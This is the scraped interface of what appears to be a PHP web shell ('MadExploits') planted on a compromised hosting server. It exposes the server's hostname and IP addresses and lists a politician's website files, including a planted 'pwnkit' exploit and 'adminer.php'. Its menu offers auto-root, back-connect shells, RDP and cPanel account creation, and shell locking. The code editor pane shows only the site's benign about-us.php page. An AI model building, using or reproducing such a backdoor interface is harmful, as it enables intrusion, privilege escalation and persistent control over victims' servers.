Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
sohailbio.com /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
about-us.php
5.56
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
contact-us.php
6.9
KB
-rw-r--r--
index.php
11.75
KB
-rw-r--r--
news-detail.php
13.52
KB
-rw-r--r--
news-events.php
4.51
KB
-rw-r--r--
photo-gallery-detail.php
5.06
KB
-rw-r--r--
photo-gallery.php
3.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
video-gallery.php
3.83
KB
-rw-r--r--
youth-congress-logo.png
205.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : about-us.php
<!DOCTYPE html> <html lang="zxx"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="apple-touch-icon" sizes="57x57" href="assets/images/favicon.png"> <link rel="manifest" href="assets/images/favicon.png"> <meta name="msapplication-TileColor" content="#ffffff"> <meta name="theme-color" content="#ffffff"> <title>MD Sohail Uddin</title> <?php include("includes/css.php");?> <style> .mission2-con p { text-align: justify } .mission2-section .mission2-con { padding: 20px 22px; } </style> </head> <body> <?php include("includes/header.php");?> <div class="pbmit-title-bar-wrapper" style="background-image: url(assets/images/contact-bg-img.jpg);"> <div class="container"> <div class="pbmit-title-bar-content"> <div class="pbmit-title-bar-content-inner"> <div class="pbmit-tbar"> <div class="pbmit-tbar-inner container"> <h1 class="pbmit-tbar-title">About Us</h1> </div> </div> <div class="pbmit-breadcrumb"> <div class="pbmit-breadcrumb-inner"> <span><a title="" href="index.php" class="home"><span>Home</span></a></span> <span class="sep">/</span> <span><span class="post-root post post-post current-item">About US</span></span> </div> </div> </div> </div> </div> </div> <section class="about-main-section index2-about-main-section w-100 float-left padding-top"> <div class="container"> <div class="row index2-about-inner-con mb-4"> <div class="col-md-7 index2-about-left-con abtdata"> <div class="generic-title"> <span class="small-txt d-inline-block" data-aos="fade-up" data-aos-duration="700">KNOW MORE ABOUT</span> <h2 data-aos="fade-up" data-aos-duration="700">Building a Stronger Future</h2> </div> <p data-aos="fade-up" data-aos-duration="700">MD Sohail Uddin is a dynamic young leader and a dedicated pharmacist who has committed his life to public service. His political journey began during his college years, where he actively engaged in addressing community issues. His relentless dedication to solving challenges, combined with his ability to connect with people, has led him to hold several key positions within the Indian Youth Congress (IYC). Today, he proudly serves as the President of the IYC Research Department in Telangana, working towards policy research, youth empowerment, and social development.</p> </div> <div class="col-md-5" data-aos="fade-up" data-aos-duration="700"> <img src="assets/images/indian-youth-congress.jpg" class="img-fluid"> </div> </div> </div> </section> <section class="mission-section mission2-section w-100 float-left padding-top padding-bottom light-bg"> <div class="container"> <div class="generic-title text-center"> <h2 data-aos="fade-up" data-aos-duration="700">Political Journey</h2> </div> <div class="mission-inner-con mission2-inner-con"> <div class="mission-con mission2-con" data-aos="fade-up" data-aos-duration="700"> <h4 class="text-center">Early Political Life</h4> <p>• Inspired by a passion for public service, he started working on grassroots initiatives while in college.<br /> • Engaged in student politics, addressing concerns related to education, employment, and social welfare.<br /> • Developed strong leadership skills and became a bridge between students and policymakers.</p> </div> <div class="mission-con mission2-con" data-aos="fade-up" data-aos-duration="700"> <h4 class="text-center">Growth in IYC</h4> <p>• Gained recognition for his consistent efforts in problem-solving and mobilizing youth.<br /> • Held multiple leadership positions, contributing to various social and political campaigns.<br /> • Led initiatives focusing on education reforms, employment generation, and healthcare accessibility.<br /> • Strengthened relationships with senior party leaders, earning their trust and mentorship.</p> </div> <div class="mission-con mission2-con" data-aos="fade-up" data-aos-duration="700"> <h4 class="text-center">Current Role: President</h4> <p>• Overseeing research on critical issues affecting youth and the community.<br /> • Developing data-driven policies to guide the party's vision for Telangana.<br /> • Collaborating with experts, think tanks, and institutions to formulate solutions for challenges in governance, employment, and social welfare.<br /> • Engaging with young minds to encourage political awareness and active participation.</p> </div> </div> </div> </section> <?php include("includes/footer.php");?> <?php include("includes/js.php");?> </body> </html>
Close